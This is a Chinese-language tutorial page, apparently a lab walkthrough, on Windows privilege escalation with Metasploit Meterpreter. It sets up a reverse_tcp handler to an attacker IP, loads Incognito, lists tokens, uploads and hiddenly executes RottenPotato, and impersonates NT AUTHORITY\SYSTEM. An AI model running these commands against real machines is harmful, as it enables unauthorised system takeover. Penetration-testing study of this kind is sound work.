赞
踩
load incognito
incognito
模块,该模块提供了一系列与 Windows 令牌操作相关的功能,比如令牌窃取、令牌操纵等。list_tokens –u
list_token
命令用于列出当前会话中可用的访问令牌。-u
参数指定列出用户令牌,这些令牌代表系统中不同用户的访问权限。upload
命令用于将文件从攻击者的机器上传到目标机器。这里尝试上传 /root/rottenpotato.exe
文件到当前 Meterpreter 会话的工作目录。/home/kali/Desktop/
目录下的 rottenpotato.exe
文件上传到 Meterpreter 会话的当前工作目录。如果当前工作目录是目标机器上的根目录,那么文件将被上传到那里execute -Hc -f rottenpotato.exe
execute
命令用于在目标机器上执行一个程序。-Hc
参数指定隐藏控制台窗口,-f
参数指定执行指定的文件(这里是 rottenpotato.exe
)。impersonate_token "NT AUTHORITY\SYSTEM"
impersonate_token
命令用于模拟一个特定的访问令牌,从而获得该令牌的权限。这里指定模拟的是具有最高权限的系统令牌 NT AUTHORITY\SYSTEM
。list_tokens -u
命令被用来列出当前会话中可用的用户令牌。下面是输出结果的解释:Delegation Tokens Available:
GOD\Administrator
,这意味着目标机器上的 Administrator
用户账户的令牌是可用的,并且可以被用来进行令牌窃取或模拟。Impersonation Tokens Available:
当你在渗透测试或安全评估中使用 Meterpreter 时,这些信息非常有用,因为它们可以帮助你确定可以利用哪些账户的权限来提升你的会话权限或执行特定的任务。
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.247.130
set LPORT 4444
exploit
incognito
模块load incognito
list_tokens –u
upload /home/kali/Desktop rottenpotato.exe .
execute -Hc -f rottenpotato.exe
NT AUTHORITY\SYSTEM
。list_tokens –u
与第四步对比少了一句
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
证明已经提权成功
getuid
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。